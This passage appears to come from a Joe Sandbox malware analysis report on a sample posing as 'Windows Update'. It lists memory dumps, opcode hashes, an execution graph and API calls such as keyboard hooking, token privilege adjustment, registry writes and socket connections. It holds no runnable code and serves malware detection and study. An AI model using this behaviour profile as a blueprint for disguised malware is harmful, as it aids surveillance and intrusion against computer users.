                                                                                                                    • _free.LIBCMT ref: 003229DC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free_malloc
                                                                                                                    • String ID: D>-
                                                                                                                    • API String ID: 845055658-2361965318
                                                                                                                    • Opcode ID: be32a0e7283fd9dab065fc0c4e83e95be0851cdeedba71370ae29a3d716adb1b
                                                                                                                    • Instruction ID: c2fb35c2484fd4f37c9bf8a5850f4ad47fde9a14c34342e635f3486873caeb4e
                                                                                                                    • Opcode Fuzzy Hash: be32a0e7283fd9dab065fc0c4e83e95be0851cdeedba71370ae29a3d716adb1b
                                                                                                                    • Instruction Fuzzy Hash: A4F0BB31B8523477EB312A947C07F9A3A589B05B70F200361FE1CAD1D0D6E1695053D9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:5.5%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:2.3%
                                                                                                                    Total number of Nodes:257
                                                                                                                    Total number of Limit Nodes:15
                                                                                                                    execution_graph 55392 55217d6 55394 552180b GetAdaptersInfo 55392->55394 55395 552183b 55394->55395 55396 552605e 55397 5526084 GetDriveTypeW 55396->55397 55399 55260a0 55397->55399 55400 55200de 55402 552010a LoadLibraryShim 55400->55402 55403 5520138 55402->55403 55404 12ba3a6 55405 12ba3cf GetLogicalDrives 55404->55405 55406 12ba405 55404->55406 55407 12ba3dd 55405->55407 55406->55405 55408 5522942 55411 5522977 GetAdaptersAddresses 55408->55411 55410 55229b0 55411->55410 55412 12bb0be 55413 12bb105 55412->55413 55414 12bb108 GetIfEntry 55413->55414 55415 12bb160 55413->55415 55417 12bb110 55414->55417 55416 12bb194 55415->55416 55423 53a259d 55415->55423 55432 53a2506 55415->55432 55441 53a1c60 55415->55441 55450 53a204f 55415->55450 55459 53a1c70 55415->55459 55424 53a25ae 55423->55424 55425 53a2986 55424->55425 55468 53a5abd 55424->55468 55473 53a5ad0 55424->55473 55426 53a2bd1 55425->55426 55478 53a6c50 55425->55478 55486 53a6c60 55425->55486 55491 53a6c07 55425->55491 55426->55415 55433 53a2517 55432->55433 55434 53a2986 55433->55434 55436 53a5abd 2 API calls 55433->55436 55437 53a5ad0 2 API calls 55433->55437 55435 53a2bd1 55434->55435 55438 53a6c60 2 API calls 55434->55438 55439 53a6c50 2 API calls 55434->55439 55440 53a6c07 2 API calls 55434->55440 55435->55415 55436->55434 55437->55434 55438->55435 55439->55435 55440->55435 55442 53a1c70 55441->55442 55443 53a2986 55442->55443 55445 53a5abd 2 API calls 55442->55445 55446 53a5ad0 2 API calls 55442->55446 55444 53a2bd1 55443->55444 55447 53a6c60 2 API calls 55443->55447 55448 53a6c50 2 API calls 55443->55448 55449 53a6c07 2 API calls 55443->55449 55444->55415 55445->55443 55446->55443 55447->55444 55448->55444 55449->55444 55452 53a2060 55450->55452 55451 53a2986 55453 53a2bd1 55451->55453 55456 53a6c60 2 API calls 55451->55456 55457 53a6c50 2 API calls 55451->55457 55458 53a6c07 2 API calls 55451->55458 55452->55451 55454 53a5abd 2 API calls 55452->55454 55455 53a5ad0 2 API calls 55452->55455 55453->55415 55454->55451 55455->55451 55456->55453 55457->55453 55458->55453 55460 53a1ca6 55459->55460 55461 53a2986 55460->55461 55463 53a5abd 2 API calls 55460->55463 55464 53a5ad0 2 API calls 55460->55464 55462 53a2bd1 55461->55462 55465 53a6c60 2 API calls 55461->55465 55466 53a6c50 2 API calls 55461->55466 55467 53a6c07 2 API calls 55461->55467 55462->55415 55463->55461 55464->55461 55465->55462 55466->55462 55467->55462 55469 53a5af8 55468->55469 55471 53a5b8b 55469->55471 55497 12bbf0e 55469->55497 55500 12bbedb 55469->55500 55471->55425 55474 53a5af8 55473->55474 55475 53a5b8b 55474->55475 55476 12bbedb SetWindowsHookExA 55474->55476 55477 12bbf0e SetWindowsHookExA 55474->55477 55475->55425 55476->55475 55477->55475 55479 53a6c8b 55478->55479 55481 53a6c5f 55478->55481 55480 53a6c91 55479->55480 55484 12ba87f closesocket 55479->55484 55508 12ba8ae 55479->55508 55480->55426 55483 12ba8ae closesocket 55481->55483 55504 12ba87f 55481->55504 55483->55480 55484->55480 55487 53a6c72 55486->55487 55489 12ba87f closesocket 55487->55489 55490 12ba8ae closesocket 55487->55490 55488 53a6c91 55488->55426 55489->55488 55490->55488 55492 53a6c0b 55491->55492 55493 53a6c13 55492->55493 55495 12ba87f closesocket 55492->55495 55496 12ba8ae closesocket 55492->55496 55493->55426 55494 53a6c91 55494->55426 55495->55494 55496->55494 55498 12bbf5e SetWindowsHookExA 55497->55498 55499 12bbf66 55498->55499 55499->55471 55501 12bbf0e SetWindowsHookExA 55500->55501 55503 12bbf66 55501->55503 55503->55471 55505 12ba8ae closesocket 55504->55505 55507 12ba8e8 55505->55507 55507->55480 55509 12ba8da closesocket 55508->55509 55510 12ba910 55508->55510 55511 12ba8e8 55509->55511 55510->55509 55511->55480 55512 5523a4a 55514 5523a7f WSAConnect 55512->55514 55515 5523a9e 55514->55515 55516 5523e4a 55517 5523e7f K32GetModuleInformation 55516->55517 55519 5523eb6 55517->55519 55520 5525cca 55522 5525cf3 CopyFileW 55520->55522 55523 5525d1a 55522->55523 55524 552314e 55525 5523183 RasConnectionNotificationW 55524->55525 55527 55231b6 55525->55527 55528 5522772 55531 55227a7 GetProcessTimes 55528->55531 55530 55227d9 55531->55530 55532 55207f2 55533 5520842 RasEnumConnectionsW 55532->55533 55534 5520850 55533->55534 55535 552157a 55536 55215a6 FindClose 55535->55536 55537 55215d8 55535->55537 55538 55215bb 55536->55538 55537->55536 55539 5522f62 55542 5522f97 WSAIoctl 55539->55542 55541 5522fe5 55542->55541 55543 5523d62 55546 5523d97 K32EnumProcessModules 55543->55546 55545 5523dc6 55546->55545 55547 12ba69a 55548 12ba6ef 55547->55548 55549 12ba6c6 SetErrorMode 55547->55549 55548->55549 55550 12ba6db 55549->55550 55551 12ba09a 55552 12ba0cf recv 55551->55552 55553 12ba107 55551->55553 55554 12ba0dd 55552->55554 55553->55552 55555 552386a 55557 55238a5 getaddrinfo 55555->55557 55558 5523917 55557->55558 55559 5523f6a 55560 5523fba K32GetModuleFileNameExW 55559->55560 55561 5523fc2 55560->55561 55562 552546a 55565 55254a5 LoadLibraryA 55562->55565 55564 55254e2 55565->55564 55566 552306a 55567 552309f WSAEventSelect 55566->55567 55569 55230d6 55567->55569 55574 12baa12 55575 12baa6f 55574->55575 55576 12baa44 SetWindowLongW 55574->55576 55575->55576 55577 12baa59 55576->55577 55578 5525a6e 55580 5525a97 SetFileAttributesW 55578->55580 55581 5525ab3 55580->55581 55582 5523c92 55584 5523cc1 AdjustTokenPrivileges 55582->55584 55585 5523ce3 55584->55585 55586 53a6bfc 55588 53a63ac 55586->55588 55587 53a63bd LdrInitializeThunk 55587->55588 55588->55587 55589 552321a 55591 5523252 RegOpenCurrentUser 55589->55591 55592 5523285 55591->55592 55597 5522c9a 55598 5522cea CertGetCertificateChain 55597->55598 55599 5522cf2 55598->55599 55600 12bb362 55601 12bb39a CreateFileW 55600->55601 55603 12bb3e9 55601->55603 55604 552341e 55605 5523453 RegNotifyChangeKeyValue 55604->55605 55607 5523490 55605->55607 55608 5521002 55609 5521062 55608->55609 55610 5521037 SendMessageW 55608->55610 55609->55610 55611 552104c 55610->55611 55612 5524b82 55614 5524bb7 CertVerifyCertificateChainPolicy 55612->55614 55615 5524be6 55614->55615 55616 12bb47a 55617 12bb4af GetFileType 55616->55617 55619 12bb4dc 55617->55619 55620 12ba2fa 55621 12ba326 FindCloseChangeNotification 55620->55621 55622 12ba365 55620->55622 55623 12ba334 55621->55623 55622->55621 55624 12bbbfa 55625 12bbc32 LsaOpenPolicy 55624->55625 55627 12bbc73 55625->55627 55628 12bb7fa 55630 12bb82f ReadFile 55628->55630 55631 12bb861 55630->55631 55632 5522e86 55634 5522ebb ioctlsocket 55632->55634 55635 5522ee7 55634->55635 55636 552610a 55637 5526173 55636->55637 55638 552613f PostMessageW 55636->55638 55637->55638 55639 5526154 55638->55639 55652 12ba172 gethostname 55653 12ba1c4 55652->55653 55654 552598e 55655 55259c3 RegSetValueExW 55654->55655 55657 5525a07 55655->55657 55658 5521ab2 55659 5521b22 55658->55659 55660 5521aea setsockopt 55658->55660 55659->55660 55661 5521af8 55660->55661 55662 55208b2 55663 55208d8 GetTextExtentPoint32W 55662->55663 55665 5520905 55663->55665 55669 5522a3a 55671 5522a6f GetPerAdapterInfo 55669->55671 55672 5522aa2 55671->55672 55673 552163e 55675 5521664 DeleteFileW 55673->55675 55676 5521680 55675->55676 55677 5525fbe 55678 5525fea KiUserCallbackDispatcher 55677->55678 55679 552601e 55677->55679 55680 5525fff 55678->55680 55679->55678 55681 55224a2 55684 55224da CreateMutexW 55681->55684 55683 552251d 55684->55683 55685 5522126 55686 552215e MapViewOfFile 55685->55686 55688 55221ad 55686->55688 55689 5522026 55690 552205e OpenFileMappingW 55689->55690 55692 5522099 55690->55692 55693 12bac5e 55695 12bac93 RegQueryValueExW 55693->55695 55696 12bace7 55695->55696 55697 12bb8de 55698 12bb913 GetTokenInformation 55697->55698 55700 12bb950 55698->55700 55701 552632a 55702 5526356 DispatchMessageW 55701->55702 55703 552637f 55701->55703 55704 552636b 55702->55704 55703->55702 55705 5522b2a 55706 5522b62 getnameinfo 55705->55706 55708 5522bc9 55706->55708 55709 55225aa 55711 55225df shutdown 55709->55711 55712 5522608 55711->55712 55713 55219ae 55715 55219e6 WSASocketW 55713->55715 55716 5521a22 55715->55716 55717 12bab56 55718 12bab8e RegOpenKeyExW 55717->55718 55720 12babe4 55718->55720 55721 12ba5d6 55722 12ba64c 55721->55722 55723 12ba614 DuplicateHandle 55721->55723 55722->55723 55724 12ba622 55723->55724

                                                                                                                    Executed Functions

                                                                                                                    Function 05523C5B Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 05523CDB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustPrivilegesToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2874748243-0
                                                                                                                    • Opcode ID: f646c36dcd9f6969c75753e9fef855013a99085c440c5926255ea6f7153fb592
                                                                                                                    • Instruction ID: 5f4a8242a5e3b6a553ede85778a3375a8a2e25d0863fab7f9dfc2c7aac2f7b83
                                                                                                                    • Opcode Fuzzy Hash: f646c36dcd9f6969c75753e9fef855013a99085c440c5926255ea6f7153fb592
                                                                                                                    • Instruction Fuzzy Hash: 4821A375509780AFDB238F25DC40B52BFB4FF07210F1984DAE9858F1A3D2759908CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 055217B4 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetAdaptersInfo.IPHLPAPI(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 0552182C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdaptersInfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3177971545-0
                                                                                                                    • Opcode ID: 61f9caa95b93291c9c242616e3eff8dcbe7b4e9146af6292c681c825b9b6d8c0
                                                                                                                    • Instruction ID: 1ae813a22f8e6781795d784e4d8f4766a34e723a0bb4399170566fe5363e97e0
                                                                                                                    • Opcode Fuzzy Hash: 61f9caa95b93291c9c242616e3eff8dcbe7b4e9146af6292c681c825b9b6d8c0
                                                                                                                    • Instruction Fuzzy Hash: DE11D6715043847FEB228B15DC84F66FFB8EF46720F1880DBE9449B292C268A508CB71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 055217D6 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetAdaptersInfo.IPHLPAPI(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 0552182C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdaptersInfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3177971545-0
                                                                                                                    • Opcode ID: 348ee82fbed9530054a84e355519efa3c5764cfea4f4036fb0cd3d8cf48e578c
                                                                                                                    • Instruction ID: 73b85b83cc3c68382d773f8d57ed5d408ff08805ccaa9f0870fb2eeee4a2c760
                                                                                                                    • Opcode Fuzzy Hash: 348ee82fbed9530054a84e355519efa3c5764cfea4f4036fb0cd3d8cf48e578c
                                                                                                                    • Instruction Fuzzy Hash: 8701C071500644BFEB21DF19DC85F67FBA8EF05720F1884AAED449B281D678A509CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05523C92 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 05523CDB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustPrivilegesToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2874748243-0
                                                                                                                    • Opcode ID: d00c3f978a0ac7483e98bbea5e7ec245048dc45e36b1f65168cfea9049621fdf
                                                                                                                    • Instruction ID: 7f82c5de477f64649d173f49e34e6a9eb2bc18023da55493db7d9098928692f3
                                                                                                                    • Opcode Fuzzy Hash: d00c3f978a0ac7483e98bbea5e7ec245048dc45e36b1f65168cfea9049621fdf
                                                                                                                    • Instruction Fuzzy Hash: 7811AC315006009FDB21CF55D884B66FBE4FF09220F18C8AAED8A8B6A2D775E418CF71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 055237E0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 300 55237e0-552380f 301 5523841-5523845 300->301 302 5523811-5523834 300->302 304 5523846-5523907 301->304 302->304 305 5523836-552383d 302->305 311 5523959-552395e 304->311 312 5523909-5523911 getaddrinfo 304->312 305->301 311->312 314 5523917-5523929 312->314 315 5523960-5523965 314->315 316 552392b-5523956 314->316 315->316
                                                                                                                    APIs
                                                                                                                    • getaddrinfo.WS2_32(?,00000E2C), ref: 0552390F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: getaddrinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 300660673-0
                                                                                                                    • Opcode ID: 2f6d0b3837fe845c9faa1da6be209668fbd673e873fea944f82794899bcff13f
                                                                                                                    • Instruction ID: 165b3ccb6398eb256fab8a9d4e3b6b6948668e009856f19b462bc1e5afd97a2e
                                                                                                                    • Opcode Fuzzy Hash: 2f6d0b3837fe845c9faa1da6be209668fbd673e873fea944f82794899bcff13f
                                                                                                                    • Instruction Fuzzy Hash: 49517F7140D3C06FE7238B248C65BA2BFB8AF07314F1A44DBE9849F1A3D6686909C771
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0552256C Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 745 552256c-5522576 746 5522521-5522533 745->746 747 5522578 745->747 748 5522565-552256a 746->748 749 5522535-552255b 746->749 750 5522592-55225f8 747->750 751 552257a-5522591 747->751 748->749 757 552263a-552263f 750->757 758 55225fa-5522602 shutdown 750->758 751->750 757->758 759 5522608-552261a 758->759 761 5522641-5522646 759->761 762 552261c-5522639 759->762 761->762
                                                                                                                    APIs
                                                                                                                    • shutdown.WS2_32(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 05522600
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: shutdown
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2510479042-0
                                                                                                                    • Opcode ID: 35d987b6a2ee9ce7ffa7f1f63d57e6d54298990cef95705571bb3ac8334d5434
                                                                                                                    • Instruction ID: ac12f9a1366dff2a08c46108eb927a1485e659997078341f81726bc21c9113a0
                                                                                                                    • Opcode Fuzzy Hash: 35d987b6a2ee9ce7ffa7f1f63d57e6d54298990cef95705571bb3ac8334d5434
                                                                                                                    • Instruction Fuzzy Hash: 3A31F6765053806FE722CB14DC45BA6BFA8FF06320F1880EBDD449F292D2756909CB71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05521951 Relevance: 1.6, APIs: 1, Instructions: 105networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 765 5521951-552197f 767 55219a1-5521a12 765->767 768 5521981-552199e 765->768 772 5521a63-5521a68 767->772 773 5521a14-5521a1c WSASocketW 767->773 768->767 772->773 774 5521a22-5521a38 773->774 776 5521a6a-5521a6f 774->776 777 5521a3a-5521a60 774->777 776->777
                                                                                                                    APIs
                                                                                                                    • WSASocketW.WS2_32(?,?,?,?,?), ref: 05521A1A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Socket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 38366605-0
                                                                                                                    • Opcode ID: 6e829fbb34b591801a58b2b0892fe5d8f9138352e559246249c8c5a094ea83c7
                                                                                                                    • Instruction ID: 0a31e8fad816948871584c666c7e161eca5ae4233185efc749177c79dc177b81
                                                                                                                    • Opcode Fuzzy Hash: 6e829fbb34b591801a58b2b0892fe5d8f9138352e559246249c8c5a094ea83c7
                                                                                                                    • Instruction Fuzzy Hash: 91415B7150D7C0AFE7238F658C54B56BFB4AF07210F1985DBE9848F1A3C369A909CB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0552592E Relevance: 1.6, APIs: 1, Instructions: 104registryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 780 552592e-55259d4 784 55259d6 780->784 785 55259d9-55259f0 780->785 784->785 787 55259f2-5525a05 RegSetValueExW 785->787 788 5525a27-5525a2c 785->788 789 5525a07-5525a24 787->789 790 5525a2e-5525a33 787->790 788->787 790->789
                                                                                                                    APIs
                                                                                                                    • RegSetValueExW.KERNELBASE(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 055259F8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Value
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3702945584-0
                                                                                                                    • Opcode ID: 719664b9d77366bb75918e5de4913219ccd3d42000f2d10e68707a459585a43d
                                                                                                                    • Instruction ID: 726bd249aeb3772ad963b6cc7a321c3565ee3d41f9c50bb47372b61ac30f4591
                                                                                                                    • Opcode Fuzzy Hash: 719664b9d77366bb75918e5de4913219ccd3d42000f2d10e68707a459585a43d
                                                                                                                    • Instruction Fuzzy Hash: CB316D7100E3C06FD7238B648C51A62BFB8AF07610F0985DBD985DF1A3D2689849CB72
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 055215E6 Relevance: 1.6, APIs: 1, Instructions: 103fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 794 55215e6-552160f 795 5521612-5521613 794->795 796 55215ba-55215d7 794->796 797 5521615-5521662 795->797 798 5521669-5521670 795->798 802 5521667-5521668 797->802 803 5521664 797->803 799 5521672-5521692 DeleteFileW 798->799 800 55216b1-55216b6 798->800 806 5521694-55216b0 799->806 807 55216b8-55216bd 799->807 800->799 802->798 803->802 807->806
                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNEL32(?,EA433468,00000000,?,?,?,?,?,?,?,?,72343C38), ref: 05521678
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4033686569-0
                                                                                                                    • Opcode ID: 1a1dabf15fde770dedf01008a93300b227f9455d96cf99e4540b3c5d303495ea
                                                                                                                    • Instruction ID: 043025abe976b892b3433d8e7edca108db607c06e529b9943d61420652aeaf2d
                                                                                                                    • Opcode Fuzzy Hash: 1a1dabf15fde770dedf01008a93300b227f9455d96cf99e4540b3c5d303495ea
                                                                                                                    • Instruction Fuzzy Hash: 7B315A7550E3C05FD7138B259C55666BFB4EF07220B0D80EBDC85CF6A3D229A949CB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05522F29 Relevance: 1.6, APIs: 1, Instructions: 92networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 852 5522f29-5522fb3 856 5522fb5 852->856 857 5522fb8-5522fc1 852->857 856->857 858 5522fc3 857->858 859 5522fc6-5522fd5 857->859 858->859 860 5522fd7-5522fdf WSAIoctl 859->860 861 5523019-552301e 859->861 862 5522fe5-5522ff7 860->862 861->860 864 5523020-5523025 862->864 865 5522ff9-5523016 862->865 864->865
                                                                                                                    APIs
                                                                                                                    • WSAIoctl.WS2_32(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 05522FDD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Ioctl
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3041054344-0
                                                                                                                    • Opcode ID: 1a41898bdc4ac599ce000cc101db8b376ff2238f6fb504923ac7186d279c0fe7
                                                                                                                    • Instruction ID: 1ca6a6e8232666325742fea95a2a23c49d147ca784242b8f869ba4a88d6c37dc
                                                                                                                    • Opcode Fuzzy Hash: 1a41898bdc4ac599ce000cc101db8b376ff2238f6fb504923ac7186d279c0fe7
                                                                                                                    • Instruction Fuzzy Hash: 47318375008780AFEB228F55CC40F66FFB8FF06310F08849AE9858B162D335A509CB71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05522734 Relevance: 1.6, APIs: 1, Instructions: 90timeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 884 5522734-55227c9 889 5522816-552281b 884->889 890 55227cb-55227d3 GetProcessTimes 884->890 889->890 891 55227d9-55227eb 890->891 893 552281d-5522822 891->893 894 55227ed-5522813 891->894 893->894
                                                                                                                    APIs
                                                                                                                    • GetProcessTimes.KERNEL32(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 055227D1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProcessTimes
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1995159646-0
                                                                                                                    • Opcode ID: 3eaa6194361aa1c904cc9b76b4563eef0840cf2ebc88d4b6aa0366e174870ff7
                                                                                                                    • Instruction ID: 57da4ff0312976c75a5066438e1070beda5c22894a38de6b8fbddb142e28f33e
                                                                                                                    • Opcode Fuzzy Hash: 3eaa6194361aa1c904cc9b76b4563eef0840cf2ebc88d4b6aa0366e174870ff7
                                                                                                                    • Instruction Fuzzy Hash: 4631C8764093806FDB228F25DC45F56BFB8EF16314F0884DAE9859F193D225A909CB71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05522B2A Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 897 5522b2a-5522bab 901 5522bb0-5522bb9 897->901 902 5522bad 897->902 903 5522c13-5522c18 901->903 904 5522bbb-5522bc3 getnameinfo 901->904 902->901 903->904 906 5522bc9-5522bdb 904->906 907 5522c1a-5522c1f 906->907 908 5522bdd-5522c10 906->908 907->908
                                                                                                                    APIs
                                                                                                                    • getnameinfo.WS2_32(?,00000E2C), ref: 05522BC1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: getnameinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1866240144-0
                                                                                                                    • Opcode ID: fbdcdfc1c7809e1a4021bf09d159cafcc5a6c3f784586a8ad69780ebd740ba40
                                                                                                                    • Instruction ID: 0bcfc60756952742773e0194432438cb9af4fa3e1eac218de708277d80fbb321
                                                                                                                    • Opcode Fuzzy Hash: fbdcdfc1c7809e1a4021bf09d159cafcc5a6c3f784586a8ad69780ebd740ba40
                                                                                                                    • Instruction Fuzzy Hash: 8C215076500204AEEB21CF69CC81FABBBACFB04710F14895AEA46DA281D665A549CB71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05525F54 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,EA433468,00000000,?,?,?,?,?,?,?,?,72343C38), ref: 05525FF0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CallbackDispatcherUser
